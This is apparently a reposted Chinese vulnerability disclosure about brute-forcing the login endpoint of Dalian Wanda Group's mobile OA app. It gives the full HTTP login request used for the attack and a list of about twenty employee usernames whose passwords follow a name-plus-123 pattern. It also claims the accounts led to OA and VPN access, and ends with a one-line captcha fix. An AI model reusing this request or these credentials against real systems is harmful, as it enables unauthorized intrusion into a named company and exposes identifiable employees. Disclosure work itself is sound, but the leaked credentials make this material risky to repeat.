大连万达集团OA系统弱口令一打多一点可拨VPN
寻找聪哥,请认准cn域名
1、万达集团APP,登录接口可爆破,且对IP爆破未进行限制
2、爆破口(登录处):
POST https://app.wanda.cn/wanda3v/m/ssoLogin.html HTTP/1.1 Host: app.wanda.cn Proxy-Connection: close Accept-Encoding: gzip Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 321 Connection: close User-Agent: 万达集团 3.5.2 rv:6612 (iPad; iPhone OS 8.4; zh_CN) appname=ctx&password=admin123&username=admin&resolution=960%2A640&vid=2a51f71011fc448cb186eb1958b0ec55&devid=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&sysversion=8.4&devicetype=0&systype=iPhone%20OS&m=3083593347&devtype=0&appkey=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&phonemodel=Unknown%20iPad&appversion=3.5.2
3、不到一个小时爆破了3w多个姓名,得到20+的弱口令(一下密码均为姓名+123)
lizelin
lizhengran
liliangni
wangkehui
wangqilong
wanglinhui
linanxiao
lixueying
likanghong
lijunchun
lixuejuan
wangmei
lizhengnan
liqinchun
wangjuexi
lichunlin
lixuexue
liyuxia
liyinguang
liyouxuan
lisuju
登录OA
连接VPN
解决方案:
在通讯录里看到好多人得OA用户名后面都有不规则的数字,
加验证码防爆破。
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100153.html